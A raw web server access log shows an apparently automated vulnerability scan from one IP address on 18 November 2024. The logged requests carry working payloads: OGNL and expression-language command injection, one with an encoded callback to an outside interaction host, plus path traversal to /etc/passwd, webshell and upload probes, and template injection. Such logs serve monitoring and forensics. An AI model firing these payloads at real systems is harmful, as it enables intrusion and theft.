195.164.49.69 - - [18/Nov/2024:23:25:43 +0000] GET /index.action?redirectAction%3A%24%7B%23context%5B%22xwork.MethodAccessor.denyMethodExecution%22%5D%3Dfalse%2C%23f%3D%23%5FmemberAccess.getClass().getDeclaredField(%22allowStaticMethodAccess%22)%2C%23f.setAccessible(true)%2C%23f.set(%23%5FmemberAccess%2Ctrue)%2C%23a%3D%40java.lang.Runtime%40getRuntime().exec(%22sh%20-c%20id%22).getInputStream()%2C%23b%3Dnew%20java.io.InputStreamReader(%23a)%2C%23c%3Dnew%20java.io.BufferedReader(%23b)%2C%23d%3Dnew%20char%5B5000%5D%2C%23c.read(%23d)%2C%23genxor%3D%23context.get(%22com.opensymphony.xwork2.dispatcher.HttpServletResponse%22).getWriter()%2C%23genxor.println(%23d)%2C%23genxor.flush()%2C%23genxor.close()%7D HTTP/1.1 404 1086
- - - [18/Nov/2024:23:25:46 +0000] GET null HTTP/1.1 400 2308
- - - [18/Nov/2024:23:25:46 +0000] GET null HTTP/1.1 400 2308
- - - [18/Nov/2024:23:25:46 +0000] GET null HTTP/1.1 400 2308
195.164.49.69 - - [18/Nov/2024:23:25:46 +0000] GET /index.action?redirect%3A%24%7B%23context%5B%22xwork.MethodAccessor.denyMethodExecution%22%5D%3Dfalse%2C%23f%3D%23%5FmemberAccess.getClass().getDeclaredField(%22allowStaticMethodAccess%22)%2C%23f.setAccessible(true)%2C%23f.set(%23%5FmemberAccess%2Ctrue)%2C%23a%3D%40java.lang.Runtime%40getRuntime().exec(%22sh%20-c%20id%22).getInputStream()%2C%23b%3Dnew%20java.io.InputStreamReader(%23a)%2C%23c%3Dnew%20java.io.BufferedReader(%23b)%2C%23d%3Dnew%20char%5B5000%5D%2C%23c.read(%23d)%2C%23genxor%3D%23context.get(%22com.opensymphony.xwork2.dispatcher.HttpServletResponse%22).getWriter()%2C%23genxor.println(%23d)%2C%23genxor.flush()%2C%23genxor.close()%7D HTTP/1.1 404 1086
- - - [18/Nov/2024:23:25:46 +0000] GET null HTTP/1.1 400 2308
- - - [18/Nov/2024:23:25:46 +0000] GET null HTTP/1.1 400 2308
195.164.49.69 - - [18/Nov/2024:23:25:46 +0000] GET /index.action?action%3A%24%7B%23context%5B%22xwork.MethodAccessor.denyMethodExecution%22%5D%3Dfalse%2C%23f%3D%23%5FmemberAccess.getClass().getDeclaredField(%22allowStaticMethodAccess%22)%2C%23f.setAccessible(true)%2C%23f.set(%23%5FmemberAccess%2Ctrue)%2C%23a%3D%40java.lang.Runtime%40getRuntime().exec(%22sh%20-c%20id%22).getInputStream()%2C%23b%3Dnew%20java.io.InputStreamReader(%23a)%2C%23c%3Dnew%20java.io.BufferedReader(%23b)%2C%23d%3Dnew%20char%5B5000%5D%2C%23c.read(%23d)%2C%23genxor%3D%23context.get(%22com.opensymphony.xwork2.dispatcher.HttpServletResponse%22).getWriter()%2C%23genxor.println(%23d)%2C%23genxor.flush()%2C%23genxor.close()%7D HTTP/1.1 404 1086
- - - [18/Nov/2024:23:25:46 +0000] GET null HTTP/1.1 400 2308
83.212.98.101 - - [18/Nov/2024:23:25:50 +0000] GET /ReplicationManager/monitoring/ HTTP/1.1 200 111
195.164.49.69 - - [18/Nov/2024:23:25:57 +0000] GET /solr/admin/cores?wt=json HTTP/1.1 404 1098
195.164.49.69 - - [18/Nov/2024:23:25:59 +0000] POST /crowd/admin/uploadplugin.action HTTP/1.1 404 1113
195.164.49.69 - - [18/Nov/2024:23:26:06 +0000] POST /photo/p/api/album.php HTTP/1.1 404 1107
195.164.49.69 - - [18/Nov/2024:23:26:21 +0000] GET /index.php?app=main&inc=core_auth&route=login HTTP/1.1 404 1083
195.164.49.69 - - [18/Nov/2024:23:26:24 +0000] GET /ext-js/index.html HTTP/1.1 404 1095
195.164.49.69 - - [18/Nov/2024:23:26:28 +0000] GET /reports/rwservlet?report=test.rdf&desformat=html&destype=cache&JOBTYPE=rwurl&URLPARAMETER=file:/// HTTP/1.1 404 1095
195.164.49.69 - - [18/Nov/2024:23:26:31 +0000] GET / HTTP/1.1 200 11204
195.164.49.69 - - [18/Nov/2024:23:26:32 +0000] GET /cf_scripts/scripts/ajax/ckeditor/plugins/filemanager/uploadedFiles/2p2ltx5ClDhgYOwiCi3jgFTB1lJ.jsp HTTP/1.1 404 1200
195.164.49.69 - - [18/Nov/2024:23:26:33 +0000] POST /_search HTTP/1.1 404 1081
195.164.49.69 - - [18/Nov/2024:23:26:35 +0000] GET /owa/auth/x.js HTTP/1.1 404 1095
195.164.49.69 - - [18/Nov/2024:23:26:37 +0000] POST /_ignition/execute-solution HTTP/1.1 404 1104
195.164.49.69 - - [18/Nov/2024:23:26:41 +0000] PUT /SDK/webLanguage HTTP/1.1 405 1050
195.164.49.69 - - [18/Nov/2024:23:26:42 +0000] GET /poc.jsp?cmd=cat+%2Fetc%2Fpasswd HTTP/1.1 404 1081
195.164.49.69 - - [18/Nov/2024:23:26:45 +0000] GET /api/experimental/dags/example_trigger_target_dag/paused/false HTTP/1.1 404 1155
195.164.49.69 - - [18/Nov/2024:23:26:49 +0000] GET /icons/.%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd HTTP/1.1 400 1160
195.164.49.69 - - [18/Nov/2024:23:27:10 +0000] GET /cgi-bin/liveView?LD_DEBUG=help HTTP/1.1 404 1094
195.164.49.69 - - [18/Nov/2024:23:27:10 +0000] GET /cgi-bin/login?LD_DEBUG=help HTTP/1.1 404 1091
195.164.49.69 - - [18/Nov/2024:23:27:10 +0000] GET /cgi-bin/login.asp?LD_DEBUG=help HTTP/1.1 404 1095
195.164.49.69 - - [18/Nov/2024:23:27:10 +0000] GET /cgi-bin/login/login?LD_DEBUG=help HTTP/1.1 404 1101
195.164.49.69 - - [18/Nov/2024:23:27:11 +0000] GET /cgi-bin/login/login-page?LD_DEBUG=help HTTP/1.1 404 1106
195.164.49.69 - - [18/Nov/2024:23:27:11 +0000] GET /cgi-bin/login_mgr?LD_DEBUG=help HTTP/1.1 404 1095
195.164.49.69 - - [18/Nov/2024:23:27:11 +0000] GET /cgi-bin/luci?LD_DEBUG=help HTTP/1.1 404 1090
195.164.49.69 - - [18/Nov/2024:23:27:11 +0000] GET /cgi-bin/main?LD_DEBUG=help HTTP/1.1 404 1090
195.164.49.69 - - [18/Nov/2024:23:27:11 +0000] GET /cgi-bin/main-cgi?LD_DEBUG=help HTTP/1.1 404 1094
195.164.49.69 - - [18/Nov/2024:23:27:11 +0000] GET /cgi-bin/manage/login?LD_DEBUG=help HTTP/1.1 404 1102
195.164.49.69 - - [18/Nov/2024:23:27:11 +0000] GET /cgi-bin/menu?LD_DEBUG=help HTTP/1.1 404 1090
195.164.49.69 - - [18/Nov/2024:23:27:11 +0000] GET /cgi-bin/mlogin?LD_DEBUG=help HTTP/1.1 404 1092
195.164.49.69 - - [18/Nov/2024:23:27:11 +0000] GET /cgi-bin/netbinary?LD_DEBUG=help HTTP/1.1 404 1095
195.164.49.69 - - [18/Nov/2024:23:27:12 +0000] GET /cgi-bin/nobody/Captcha?LD_DEBUG=help HTTP/1.1 404 1104
195.164.49.69 - - [18/Nov/2024:23:27:12 +0000] GET /cgi-bin/nobody/VerifyCode?LD_DEBUG=help HTTP/1.1 404 1107
195.164.49.69 - - [18/Nov/2024:23:27:12 +0000] GET /cgi-bin/normal_userLogin?LD_DEBUG=help HTTP/1.1 404 1102
195.164.49.69 - - [18/Nov/2024:23:27:12 +0000] GET /cgi-bin/otgw?LD_DEBUG=help HTTP/1.1 404 1090
195.164.49.69 - - [18/Nov/2024:23:27:12 +0000] GET /cgi-bin/page?LD_DEBUG=help HTTP/1.1 404 1090
195.164.49.69 - - [18/Nov/2024:23:27:12 +0000] GET /cgi-bin/rulectl?LD_DEBUG=help HTTP/1.1 404 1093
195.164.49.69 - - [18/Nov/2024:23:27:12 +0000] GET /cgi-bin/service?LD_DEBUG=help HTTP/1.1 404 1093
195.164.49.69 - - [18/Nov/2024:23:27:12 +0000] GET /cgi-bin/set_new_config?LD_DEBUG=help HTTP/1.1 404 1100
195.164.49.69 - - [18/Nov/2024:23:27:12 +0000] GET /cgi-bin/sl_webviewer?LD_DEBUG=help HTTP/1.1 404 1098
195.164.49.69 - - [18/Nov/2024:23:27:13 +0000] GET /cgi-bin/ssi?LD_DEBUG=help HTTP/1.1 404 1089
195.164.49.69 - - [18/Nov/2024:23:27:13 +0000] GET /cgi-bin/status?LD_DEBUG=help HTTP/1.1 404 1092
195.164.49.69 - - [18/Nov/2024:23:27:13 +0000] GET /cgi-bin/sysconf?LD_DEBUG=help HTTP/1.1 404 1093
195.164.49.69 - - [18/Nov/2024:23:27:35 +0000] GET /crowd/plugins/servlet/exp HTTP/1.1 404 1111
195.164.49.69 - - [18/Nov/2024:23:27:39 +0000] GET / HTTP/1.1 200 11204
83.212.98.101 - - [18/Nov/2024:23:27:39 +0000] GET /ReplicationManager/ HTTP/1.1 200 2074
195.164.49.69 - - [18/Nov/2024:23:27:41 +0000] GET /STATE_ID/123/agentLogUploader HTTP/1.1 404 1111
195.164.49.69 - - [18/Nov/2024:23:27:55 +0000] POST /OA_HTML/BneViewerXMLService?bne:uueupload=TRUE HTTP/1.1 404 1105
195.164.49.69 - - [18/Nov/2024:23:28:03 +0000] POST /analytics/telemetry/ph/api/hyper/send?_c&_i=test HTTP/1.1 404 1131
195.164.49.69 - - [18/Nov/2024:23:28:05 +0000] POST /_ignition/execute-solution HTTP/1.1 404 1104
195.164.49.69 - - [18/Nov/2024:23:28:07 +0000] GET /%24%7B%28%23a%3D%40org.apache.commons.io.IOUtils%40toString%28%40java.lang.Runtime%40getRuntime%28%29.exec%28%22whoami%22%29.getInputStream%28%29%2C%22utf-8%22%29%29.%28%40com.opensymphony.webwork.ServletActionContext%40getResponse%28%29.setHeader%28%22X-Cmd-Response%22%2C%23a%29%29%7D/ HTTP/1.1 404 1365
195.164.49.69 - - [18/Nov/2024:23:28:09 +0000] GET /x HTTP/1.1 404 1075
195.164.49.69 - - [18/Nov/2024:23:28:10 +0000] POST /conf_mail.php HTTP/1.1 404 1087
195.164.49.69 - - [18/Nov/2024:23:28:14 +0000] POST /api/experimental/dags/example_trigger_target_dag/dag_runs HTTP/1.1 404 1147
195.164.49.69 - - [18/Nov/2024:23:28:17 +0000] POST /xmlrpc HTTP/1.1 404 1080
195.164.49.69 - - [18/Nov/2024:23:28:20 +0000] GET /rest/api/latest/repos HTTP/1.1 404 1107
195.164.49.69 - - [18/Nov/2024:23:28:20 +0000] GET /cgi-bin/.%2e/.%2e/.%2e/.%2e/etc/passwd HTTP/1.1 400 1160
195.164.49.69 - - [18/Nov/2024:23:28:34 +0000] POST /SamlResponseServlet HTTP/1.1 404 1093
195.164.49.69 - - [18/Nov/2024:23:28:36 +0000] POST /%2577eb%2575i_%2577sma_Http HTTP/1.1 404 1101
195.164.49.69 - - [18/Nov/2024:23:28:41 +0000] GET /cgi-bin/systemutil?LD_DEBUG=help HTTP/1.1 404 1096
195.164.49.69 - - [18/Nov/2024:23:28:41 +0000] GET /cgi-bin/t/out?LD_DEBUG=help HTTP/1.1 404 1095
195.164.49.69 - - [18/Nov/2024:23:28:41 +0000] GET /cgi-bin/top?LD_DEBUG=help HTTP/1.1 404 1089
195.164.49.69 - - [18/Nov/2024:23:28:41 +0000] GET /cgi-bin/unauth?LD_DEBUG=help HTTP/1.1 404 1092
195.164.49.69 - - [18/Nov/2024:23:28:41 +0000] GET /cgi-bin/upload?LD_DEBUG=help HTTP/1.1 404 1092
195.164.49.69 - - [18/Nov/2024:23:28:41 +0000] GET /cgi-bin/variable?LD_DEBUG=help HTTP/1.1 404 1094
195.164.49.69 - - [18/Nov/2024:23:28:41 +0000] GET /cgi-bin/wanstatu?LD_DEBUG=help HTTP/1.1 404 1094
195.164.49.69 - - [18/Nov/2024:23:28:41 +0000] GET /cgi-bin/webcm?LD_DEBUG=help HTTP/1.1 404 1091
195.164.49.69 - - [18/Nov/2024:23:28:41 +0000] GET /cgi-bin/webmain?LD_DEBUG=help HTTP/1.1 404 1093
195.164.49.69 - - [18/Nov/2024:23:28:41 +0000] GET /cgi-bin/webproc?LD_DEBUG=help HTTP/1.1 404 1093
195.164.49.69 - - [18/Nov/2024:23:28:42 +0000] GET /cgi-bin/webscr?LD_DEBUG=help HTTP/1.1 404 1092
195.164.49.69 - - [18/Nov/2024:23:28:42 +0000] GET /cgi-bin/webviewLogin?LD_DEBUG=help HTTP/1.1 404 1098
195.164.49.69 - - [18/Nov/2024:23:28:42 +0000] GET /cgi-bin/webviewLogin_m64?LD_DEBUG=help HTTP/1.1 404 1102
195.164.49.69 - - [18/Nov/2024:23:28:42 +0000] GET /cgi-bin/webviewer?LD_DEBUG=help HTTP/1.1 404 1095
195.164.49.69 - - [18/Nov/2024:23:28:42 +0000] GET /cgi-bin/welcome?LD_DEBUG=help HTTP/1.1 404 1093
195.164.49.69 - - [18/Nov/2024:23:28:54 +0000] POST /cf_scripts/scripts/ajax/ckeditor/plugins/filemanager/iedit.cfc?method=wizardHash&_cfclient=true&returnFormat=wddx&inPassword=foo HTTP/1.1 404 1160
195.164.49.69 - - [18/Nov/2024:23:29:08 +0000] GET /api/v1/database/1 HTTP/1.1 404 1103
195.164.49.69 - - [18/Nov/2024:23:29:09 +0000] GET /api/v1/database/6 HTTP/1.1 404 1103
195.164.49.69 - - [18/Nov/2024:23:29:09 +0000] GET /api/v1/database/2 HTTP/1.1 404 1103
195.164.49.69 - - [18/Nov/2024:23:29:09 +0000] GET /api/v1/database/3 HTTP/1.1 404 1103
195.164.49.69 - - [18/Nov/2024:23:29:09 +0000] GET /api/v1/database/4 HTTP/1.1 404 1103
195.164.49.69 - - [18/Nov/2024:23:29:09 +0000] GET /api/v1/database/5 HTTP/1.1 404 1103
195.164.49.69 - - [18/Nov/2024:23:29:09 +0000] GET /api/v1/database/9 HTTP/1.1 404 1103
195.164.49.69 - - [18/Nov/2024:23:29:09 +0000] GET /api/v1/database/7 HTTP/1.1 404 1103
195.164.49.69 - - [18/Nov/2024:23:29:09 +0000] GET /api/v1/database/10 HTTP/1.1 404 1104
195.164.49.69 - - [18/Nov/2024:23:29:19 +0000] GET /api/v1/database/1 HTTP/1.1 404 1103
195.164.49.69 - - [18/Nov/2024:23:29:29 +0000] GET /api/v1/database/7 HTTP/1.1 404 1103
195.164.49.69 - - [18/Nov/2024:23:29:29 +0000] GET /api/v1/database/2 HTTP/1.1 404 1103
195.164.49.69 - - [18/Nov/2024:23:29:30 +0000] GET /api/v1/database/3 HTTP/1.1 404 1103
195.164.49.69 - - [18/Nov/2024:23:29:30 +0000] GET /api/v1/database/4 HTTP/1.1 404 1103
195.164.49.69 - - [18/Nov/2024:23:29:30 +0000] GET /api/v1/database/5 HTTP/1.1 404 1103
195.164.49.69 - - [18/Nov/2024:23:29:30 +0000] GET /api/v1/database/6 HTTP/1.1 404 1103
195.164.49.69 - - [18/Nov/2024:23:29:30 +0000] GET /api/v1/database/7 HTTP/1.1 404 1103
195.164.49.69 - - [18/Nov/2024:23:29:30 +0000] GET /api/v1/database/9 HTTP/1.1 404 1103
195.164.49.69 - - [18/Nov/2024:23:29:30 +0000] GET /api/v1/database/10 HTTP/1.1 404 1104
195.164.49.69 - - [18/Nov/2024:23:29:30 +0000] GET /api/v1/database/1 HTTP/1.1 404 1103
195.164.49.69 - - [18/Nov/2024:23:29:30 +0000] GET /api/v1/database/2 HTTP/1.1 404 1103
195.164.49.69 - - [18/Nov/2024:23:29:30 +0000] GET /api/v1/database/3 HTTP/1.1 404 1103
195.164.49.69 - - [18/Nov/2024:23:29:31 +0000] GET /api/v1/database/4 HTTP/1.1 404 1103
195.164.49.69 - - [18/Nov/2024:23:29:31 +0000] GET /api/v1/database/5 HTTP/1.1 404 1103
195.164.49.69 - - [18/Nov/2024:23:29:31 +0000] GET /api/v1/database/6 HTTP/1.1 404 1103
195.164.49.69 - - [18/Nov/2024:23:29:45 +0000] POST /ajax-api/2.0/mlflow/registered-models/create HTTP/1.1 404 1134
195.164.49.69 - - [18/Nov/2024:23:29:51 +0000] POST /minio/bootstrap/v1/verify HTTP/1.1 404 1111
195.164.49.69 - - [18/Nov/2024:23:29:56 +0000] GET /OA_CGI/FNDWRR.exe HTTP/1.1 404 1095
195.164.49.69 - - [18/Nov/2024:23:29:58 +0000] GET /_api/web/siteusers HTTP/1.1 404 1100
195.164.49.69 - - [18/Nov/2024:23:30:02 +0000] GET / HTTP/1.1 200 11204
195.164.49.69 - - [18/Nov/2024:23:30:03 +0000] POST /_ignition/execute-solution HTTP/1.1 404 1104
195.164.49.69 - - [18/Nov/2024:23:30:11 +0000] POST /userentry?accountId=/../../../tomcat/webapps/8md00/&symbolName=test&base64UserName=YWRtaW4= HTTP/1.1 404 1083
195.164.49.69 - - [18/Nov/2024:23:30:13 +0000] POST /webtools/control/xmlrpc;/?USERNAME&PASSWORD=s&requirePasswordChange=Y HTTP/1.1 404 1111
195.164.49.69 - - [18/Nov/2024:23:30:16 +0000] POST /cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/bin/sh HTTP/1.1 400 1160
195.164.49.69 - - [18/Nov/2024:23:30:22 +0000] GET /cgi-mod/view_help.cgi HTTP/1.1 404 1099
195.164.49.69 - - [18/Nov/2024:23:30:24 +0000] GET /cslu/v1/scheduler/jobs HTTP/1.1 404 1108
195.164.49.69 - - [18/Nov/2024:23:30:26 +0000] GET /cslu/v1/var/logs/customer-cslu-lib-log.log HTTP/1.1 404 1132
195.164.49.69 - - [18/Nov/2024:23:30:28 +0000] POST /app/rest/users/id:1/tokens/2p2ltsXNae9tm4k8uvRO0XR7J8J;.jsp?jsp_precompile=true HTTP/1.1 404 1153
195.164.49.69 - - [18/Nov/2024:23:30:40 +0000] GET /api/v1/database/9 HTTP/1.1 404 1103
195.164.49.69 - - [18/Nov/2024:23:30:41 +0000] POST /api/users HTTP/1.1 404 1087
195.164.49.69 - - [18/Nov/2024:23:30:42 +0000] GET /api/v1/database/10 HTTP/1.1 404 1104
195.164.49.69 - - [18/Nov/2024:23:30:43 +0000] GET /api/v1/database/1 HTTP/1.1 404 1103
195.164.49.69 - - [18/Nov/2024:23:30:43 +0000] GET /api/v1/database/2 HTTP/1.1 404 1103
195.164.49.69 - - [18/Nov/2024:23:30:43 +0000] GET /api/v1/database/3 HTTP/1.1 404 1103
195.164.49.69 - - [18/Nov/2024:23:30:43 +0000] GET /api/v1/database/4 HTTP/1.1 404 1103
195.164.49.69 - - [18/Nov/2024:23:30:43 +0000] GET /api/v1/database/5 HTTP/1.1 404 1103
195.164.49.69 - - [18/Nov/2024:23:30:43 +0000] GET /api/v1/database/6 HTTP/1.1 404 1103
195.164.49.69 - - [18/Nov/2024:23:30:43 +0000] GET /api/v1/database/7 HTTP/1.1 404 1103
83.212.98.101 - - [18/Nov/2024:23:30:50 +0000] GET /ReplicationManager/monitoring/ HTTP/1.1 200 111
195.164.49.69 - - [18/Nov/2024:23:30:51 +0000] GET /api/v1/database/9 HTTP/1.1 404 1103
195.164.49.69 - - [18/Nov/2024:23:31:00 +0000] GET /api/v1/database/10 HTTP/1.1 404 1104
195.164.49.69 - - [18/Nov/2024:23:31:00 +0000] GET /api/v1/database/1 HTTP/1.1 404 1103
195.164.49.69 - - [18/Nov/2024:23:31:01 +0000] GET /api/v1/database/2 HTTP/1.1 404 1103
195.164.49.69 - - [18/Nov/2024:23:31:01 +0000] GET /api/v1/database/3 HTTP/1.1 404 1103
195.164.49.69 - - [18/Nov/2024:23:31:01 +0000] GET /api/v1/database/4 HTTP/1.1 404 1103
195.164.49.69 - - [18/Nov/2024:23:31:01 +0000] GET /api/v1/database/5 HTTP/1.1 404 1103
195.164.49.69 - - [18/Nov/2024:23:31:01 +0000] GET /api/v1/database/6 HTTP/1.1 404 1103
195.164.49.69 - - [18/Nov/2024:23:31:01 +0000] GET /api/v1/database/7 HTTP/1.1 404 1103
195.164.49.69 - - [18/Nov/2024:23:31:01 +0000] GET /api/v1/database/9 HTTP/1.1 404 1103
195.164.49.69 - - [18/Nov/2024:23:31:01 +0000] GET /api/v1/database/10 HTTP/1.1 404 1104
195.164.49.69 - - [18/Nov/2024:23:31:09 +0000] POST /clients/MyCRL HTTP/1.1 404 1091
195.164.49.69 - - [18/Nov/2024:23:31:11 +0000] POST /ajax-api/2.0/mlflow/model-versions/create HTTP/1.1 404 1131
195.164.49.69 - - [18/Nov/2024:23:31:13 +0000] GET /api/v1;v1%2fusers%2flogin/events/subscriptions/validation/condition/T(java.lang.Runtime).getRuntime().exec(new%20java.lang.String(T(java.util.Base64).getDecoder().decode(%22bnNsb29rdXAge3tpbnRlcmFjdHNoLXVybH19%22))) HTTP/1.1 404 1313
195.164.49.69 - - [18/Nov/2024:23:31:15 +0000] POST /cmd,/simZysh/register_main/setCookie HTTP/1.1 404 1122
195.164.49.69 - - [18/Nov/2024:23:31:17 +0000] GET /geoserver/web/wicket/bookmarkable/org.geoserver.web.demo.MapPreviewPage HTTP/1.1 404 1161
195.164.49.69 - - [18/Nov/2024:23:31:18 +0000] POST /OA_HTML/BneViewerXMLService?bne:uueupload=TRUE HTTP/1.1 404 1105
195.164.49.69 - - [18/Nov/2024:23:31:20 +0000] GET /_api/web/siteusers HTTP/1.1 404 1100
195.164.49.69 - - [18/Nov/2024:23:31:22 +0000] POST /moveitisapi/moveitisapi.dll?action=m2 HTTP/1.1 404 1105
195.164.49.69 - - [18/Nov/2024:23:31:24 +0000] POST /_ignition/execute-solution HTTP/1.1 404 1104
195.164.49.69 - - [18/Nov/2024:23:31:25 +0000] PATCH /mgmt/tm/auth/user/tVouA HTTP/1.1 501 1095
195.164.49.69 - - [18/Nov/2024:23:31:29 +0000] POST /webtools/control/main/ProgramExport HTTP/1.1 404 1121
195.164.49.69 - - [18/Nov/2024:23:31:31 +0000] GET /login.do?jvar_page_title=%3Cstyle%3E%3Cj:jelly%20xmlns:j=%22jelly%22%20xmlns:g=%27glide%27%3E%3Cg:evaluate%3Egs.addErrorMessage(1337*1337);%3C/g:evaluate%3E%3C/j:jelly%3E%3C/style%3E HTTP/1.1 404 1082
195.164.49.69 - - [18/Nov/2024:23:31:33 +0000] POST /bin/configurations/parsers/Checkpoint/CHECKPOINT.php HTTP/1.1 404 1142
195.164.49.69 - - [18/Nov/2024:23:31:35 +0000] GET /cgi-mod/index.cgi HTTP/1.1 404 1095
195.164.49.69 - - [18/Nov/2024:23:31:36 +0000] GET /8md00/CVE-2023-47246.txt?true HTTP/1.1 404 1102
195.164.49.69 - - [18/Nov/2024:23:31:37 +0000] POST /invoker/JMXInvokerServlet/ HTTP/1.1 404 1108
195.164.49.69 - - [18/Nov/2024:23:31:39 +0000] GET / HTTP/1.1 200 11204
195.164.49.69 - - [18/Nov/2024:23:31:41 +0000] POST /wp-admin/options-general.php?page=smartcode HTTP/1.1 404 1106
195.164.49.69 - - [18/Nov/2024:23:31:42 +0000] POST /service/extdirect HTTP/1.1 404 1095
195.164.49.69 - - [18/Nov/2024:23:31:44 +0000] POST /auth/requestreset HTTP/1.1 404 1095
195.164.49.69 - - [18/Nov/2024:23:31:46 +0000] POST /account/index.php HTTP/1.1 404 1095
195.164.49.69 - - [18/Nov/2024:23:31:50 +0000] POST /RPC2_Login HTTP/1.1 404 1084
195.164.49.69 - - [18/Nov/2024:23:31:52 +0000] GET /elFinder/php/connector.minimal.php?cmd=mkfile&target=l1_Lw&name=2p2ltqzSM6G5snoCjEoqNxJ3ynT.php:aaa HTTP/1.1 404 1116
195.164.49.69 - - [18/Nov/2024:23:31:54 +0000] GET /client/index.php HTTP/1.1 404 1094
195.164.49.69 - - [18/Nov/2024:23:31:57 +0000] GET /2p2ltq1qIkG91vD1bhyJD5ZDeQz.txt HTTP/1.1 404 1105
195.164.49.69 - - [18/Nov/2024:23:31:59 +0000] GET / HTTP/1.1 200 11204
195.164.49.69 - - [18/Nov/2024:23:32:01 +0000] POST /guestaccess.aspx HTTP/1.1 404 1090
195.164.49.69 - - [18/Nov/2024:23:32:03 +0000] POST /wp-admin/admin-ajax.php HTTP/1.1 404 1101
195.164.49.69 - - [18/Nov/2024:23:32:05 +0000] POST /_ignition/execute-solution HTTP/1.1 404 1104
195.164.49.69 - - [18/Nov/2024:23:32:06 +0000] POST /mgmt/shared/authn/login HTTP/1.1 404 1109
195.164.49.69 - - [18/Nov/2024:23:32:08 +0000] POST /wp-admin/admin-ajax.php HTTP/1.1 404 1101
195.164.49.69 - - [18/Nov/2024:23:32:14 +0000] GET /modules/appagebuilder/config.xml HTTP/1.1 404 1114
195.164.49.69 - - [18/Nov/2024:23:32:16 +0000] POST /geoserver/wms HTTP/1.1 404 1091
195.164.49.69 - - [18/Nov/2024:23:32:18 +0000] POST /invoker/EJBInvokerServlet/ HTTP/1.1 404 1108
195.164.49.69 - - [18/Nov/2024:23:32:22 +0000] POST /api/content/ HTTP/1.1 404 1094
195.164.49.69 - - [18/Nov/2024:23:32:23 +0000] GET / HTTP/1.1 200 11204
195.164.49.69 - - [18/Nov/2024:23:32:25 +0000] POST /OASREST/v2/authenticate HTTP/1.1 404 1105
195.164.49.69 - - [18/Nov/2024:23:32:27 +0000] POST /auth/requestreset HTTP/1.1 404 1095
195.164.49.69 - - [18/Nov/2024:23:32:28 +0000] POST /classes/Master.php?f=delete_item HTTP/1.1 404 1096
195.164.49.69 - - [18/Nov/2024:23:32:31 +0000] POST /classes/Master.php?f=delete_supplier HTTP/1.1 404 1096
195.164.49.69 - - [18/Nov/2024:23:32:33 +0000] POST /opensis/index.php HTTP/1.1 404 1095
195.164.49.69 - - [18/Nov/2024:23:32:35 +0000] GET /wp-json/lp/v1/courses/archive-course?template_path=..%2F..%2F..%2Fetc%2Fpasswd&return_type=html HTTP/1.1 404 1126
195.164.49.69 - - [18/Nov/2024:23:32:38 +0000] POST /%2577eb%2575i_%2577sma_Http HTTP/1.1 404 1101
83.212.98.101 - - [18/Nov/2024:23:32:39 +0000] GET /ReplicationManager/ HTTP/1.1 200 2074
195.164.49.69 - - [18/Nov/2024:23:32:40 +0000] POST /kubepi/api/v1/users HTTP/1.1 404 1105
195.164.49.69 - - [18/Nov/2024:23:32:42 +0000] PUT /2p2ltq1qIkG91vD1bhyJD5ZDeQz.txt HTTP/1.1 405 1050
195.164.49.69 - - [18/Nov/2024:23:32:48 +0000] POST /json/setup-restore.action HTTP/1.1 404 1103
195.164.49.69 - - [18/Nov/2024:23:32:49 +0000] POST /_ignition/execute-solution HTTP/1.1 404 1104
195.164.49.69 - - [18/Nov/2024:23:32:51 +0000] POST /mgmt/tm/util/bash HTTP/1.1 404 1103
- - - [18/Nov/2024:23:32:53 +0000] GET null HTTP/1.1 400 2308
195.164.49.69 - - [18/Nov/2024:23:32:55 +0000] POST /modules/appagebuilder/apajax.php?rand=6350201193995 HTTP/1.1 404 1114
195.164.49.69 - - [18/Nov/2024:23:32:59 +0000] POST /invoker/readonly HTTP/1.1 404 1094
195.164.49.69 - - [18/Nov/2024:23:33:00 +0000] GET /2p2lu2MkMYEAX0ZVCpHsaztMF8l.jsp HTTP/1.1 404 1105
195.164.49.69 - - [18/Nov/2024:23:33:18 +0000] GET /api/v1/database/7 HTTP/1.1 404 1103
195.164.49.69 - - [18/Nov/2024:23:33:18 +0000] GET /api/v1/database/1 HTTP/1.1 404 1103
195.164.49.69 - - [18/Nov/2024:23:33:18 +0000] GET /api/v1/database/2 HTTP/1.1 404 1103
195.164.49.69 - - [18/Nov/2024:23:33:18 +0000] GET /api/v1/database/3 HTTP/1.1 404 1103
195.164.49.69 - - [18/Nov/2024:23:33:18 +0000] GET /api/v1/database/4 HTTP/1.1 404 1103
195.164.49.69 - - [18/Nov/2024:23:33:18 +0000] GET /api/v1/database/5 HTTP/1.1 404 1103
195.164.49.69 - - [18/Nov/2024:23:33:18 +0000] GET /api/v1/database/6 HTTP/1.1 404 1103
195.164.49.69 - - [18/Nov/2024:23:33:19 +0000] GET /api/v1/database/7 HTTP/1.1 404 1103
195.164.49.69 - - [18/Nov/2024:23:33:19 +0000] GET /api/v1/database/9 HTTP/1.1 404 1103
195.164.49.69 - - [18/Nov/2024:23:33:19 +0000] GET /api/v1/database/10 HTTP/1.1 404 1104
195.164.49.69 - - [18/Nov/2024:23:33:19 +0000] GET /api/v1/database/1 HTTP/1.1 404 1103
195.164.49.69 - - [18/Nov/2024:23:33:19 +0000] GET /api/v1/database/2 HTTP/1.1 404 1103
195.164.49.69 - - [18/Nov/2024:23:33:19 +0000] GET /api/v1/database/3 HTTP/1.1 404 1103
195.164.49.69 - - [18/Nov/2024:23:33:19 +0000] GET /api/v1/database/4 HTTP/1.1 404 1103
195.164.49.69 - - [18/Nov/2024:23:33:19 +0000] GET /api/v1/database/5 HTTP/1.1 404 1103
195.164.49.69 - - [18/Nov/2024:23:33:19 +0000] GET /api/v1/database/6 HTTP/1.1 404 1103
195.164.49.69 - - [18/Nov/2024:23:33:20 +0000] GET /api/v1/database/7 HTTP/1.1 404 1103
195.164.49.69 - - [18/Nov/2024:23:33:20 +0000] GET /api/v1/database/9 HTTP/1.1 404 1103
195.164.49.69 - - [18/Nov/2024:23:33:20 +0000] GET /api/v1/database/10 HTTP/1.1 404 1104
195.164.49.69 - - [18/Nov/2024:23:33:20 +0000] GET /api/v1/database/1 HTTP/1.1 404 1103
195.164.49.69 - - [18/Nov/2024:23:33:20 +0000] GET /api/v1/database/2 HTTP/1.1 404 1103
195.164.49.69 - - [18/Nov/2024:23:33:20 +0000] GET /api/v1/database/3 HTTP/1.1 404 1103
195.164.49.69 - - [18/Nov/2024:23:33:20 +0000] GET /api/v1/database/4 HTTP/1.1 404 1103
